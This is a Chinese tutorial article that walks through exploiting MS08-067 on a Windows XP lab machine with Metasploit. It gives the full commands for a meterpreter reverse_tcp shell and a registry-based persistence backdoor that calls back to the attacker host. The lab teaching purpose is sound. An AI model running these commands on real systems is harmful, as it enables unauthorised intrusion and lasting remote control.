查看原文
其他

如何优雅而又潇洒的攻陷一台计算机

2017-11-21 合天智汇

走过路过,不要错过这个公众号哦!

小编强烈声明:本文仅为学习探索使用,如出现任何违法事件,均属个人行为!


在前面的文章中,小白为大家介绍了metasploit的安装过程(领略metasploit的风骚走位!),在这一篇文章中,我们来进一步了解metasploit渗透框架,为什么受到那么多安全技术人员的追捧。



0x01 metasploit小解析

首先我们来看一张图片


Metasploit在设计上尽可能的采用了模块化的理念,提升代码复用效率。上图是metasploit的体系结构图,由图可以看出metasploit由插件,接口,功能程序,模块四大部分组成。其中:


插件:

是能够扩充metasploit功能,组合外部工具的具有高级特性的组件。如可以将nessus,nmap,openvas等外部扫描器结合在一起使用,为用户提供一些新的功能命令。


接口:

使用metasploit功能的入口。


程序功能:

程序功能可以看作是metasploit提供的额外的小工具,帮助渗透测试人员能够更好的完成渗透任务。这些额外的小工具包括后门程序制作,免杀处理等。


模块:

模块是metasploit最核心的部分。根据渗透测试的流程,模块更是被细分出六大子模块,每一个子模块都拥有非常清晰的结构和一个预定义好的接口,可以被装载到metasploit框架中,并可以组合支持信息收集、渗透攻击与后渗透攻击拓展等渗透测试任务。



0x02 metasploit与攻击行为模型

我们说过,黑客的攻击行为大致上会遵循一个模型:

踩点-->定位-->入侵-->留后门-->抹去痕迹

那么这个攻击模型怎么和我们的metasploit结合起来呢?


踩点、定位:

使用metasploit的插件部分,调用nmap、nessus、openvas等扫描器进行信息收集和漏洞扫描。


入侵:

使用metasploit的模块部分,调用渗透攻击模块、攻击载荷模块攻陷计算机系统


留后门:

调用后渗透模块,建立可持续访问后门。

调用渗透测试攻击模块,连接后门


抹去痕迹:

文章不涉及

现在会不会有点明白了呢?

接下来,针对上述攻击模型和metasploit在各个环节中的使用进行一次实战演练。



0x03 metasploit演练

实验环境

攻击主机:装有metasploit的linux计算机(ip地址:192.168.1.101/24)

受害靶机:存在漏洞的windows xp计算机(ip地址:192.168.1.151)

网络环境:两台计算机属于同一个局域网


实验要求

参照攻击行为模型,使用metasploit攻陷受害靶机。


演练开始:


准备工作

第一步:切换到root权限

Ubuntu/Debian等系统切换命令:sudo su


第二步:安装nmap扫描器(ubuntu/debian下)(已有可跳过)

安装命令:apt-get install nmap


第三步:在linux控制台中进入metasploit的控制台终端

相关命令:msfconsole

提示:计算机上没有安装metasploit的同学请参考《领略metasploit的风骚走位!


踩点、定位

第一步:使用metasploit的插件部分,调用nmap进行漏洞扫描,确定攻击方向。

相关命令:msf > nmap --script=vuln 受害靶机ip地址

等待几分钟,可以看到扫描结果又是我们很熟悉的ms08-067漏洞。

接下来,就以ms08-067为攻击方向,进行下一步攻击操作。


入侵

使用metasploit的模块部分,调用渗透攻击模块(exploit)、攻击载荷模块(payload)攻陷计算机系统。


第一步,调用针对ms08-067这个漏洞的渗透攻击模块

1. 搜索关于ms08-067漏洞可利用的渗透攻击模块(exploit),共找到了一个可用的渗透攻击模块

相关命令:msf > search ms08_067

2. 调用找到的渗透攻击模块

相关命令:msf > use exploit/windows/smb/ms08_067_netapi


第二步,调用攻击载荷模块,即攻入受害靶机后需要在靶机上执行的代码。

1. 搜索可用的攻击载荷模块(payload)

相关命令:msf exploit(ms08_067_netapi) > show payloads

2. 在这里,我们使用比较经典的meterpreter tcp回弹的攻击载荷(payload)

3. 调用攻击载荷

相关命令:msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp


第三步,设置其他攻击必要参数

1. 查看metasploit针对ms08-067的攻击还需要哪些必要参数

相关命令:msf exploit(ms08_067_netapi) > show options

2. 由查看结果得出,想要进行攻击还需要设置RHOST和LHOST参数,其中RHOST参数值为受害靶机的ip地址,LHOST设置的是攻击主机的ip地址。


3. 接下来,设置LHOST参数和RHOST参数

相关命令:
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.151
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.101

4. 最后,设置完毕之后敲入命令exploit即可开始攻击

相关命令:
msf exploit(ms08_067_netapi) > exploit

5. 查看ip地址,验证是否攻击成功

相关命令:meterpreter > ipconfig


留后门

第一步:调用persistence后渗透模块,在受害靶机的注册表值

1.HKLM\Software\Microsoft\Windows\Currentve2.rsion\Run中添加键值,达到自启动的目的。

3.-X参数指定启动的方式为开机自启动。

4.-i的参数指定反向连接的时间间隔。

5.-p指的是将后门连接到指定端口。

6.-r指的是想要连接后门的攻击主机的IP地址。

相关命令:meterpreter > run persistence -X -i 5 -p 443 -r 192.168.1.101


第二步:调用渗透测试攻击模块,监听刚设置的443端口,连接后门。

1. 调用渗透测试攻击模块

相关命令:
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.1.101
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit

2. 查看ip地址,验证是否攻击成功

相关命令:meterpreter > ipconfig



0x04 总结

重点理解攻击行为模型和metasploit攻击操作过程。


本文转自简书作者:小白客

别忘了投稿哟!!!

合天公众号开启原创投稿啦!!!

大家有好的技术原创文章。

欢迎投稿至邮箱:edu@heetian.com

合天会根据文章的时效、新颖、文笔、实用等多方面评判给予100元-500元不等的稿费哟。

有才能的你快来投稿吧!

重金悬赏 | 合天原创投稿奖励来啦!

    合天智汇

网址 : www.heetian.com

电话:4006-123-731

长按图片,据说只有学霸才能识别哦→

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存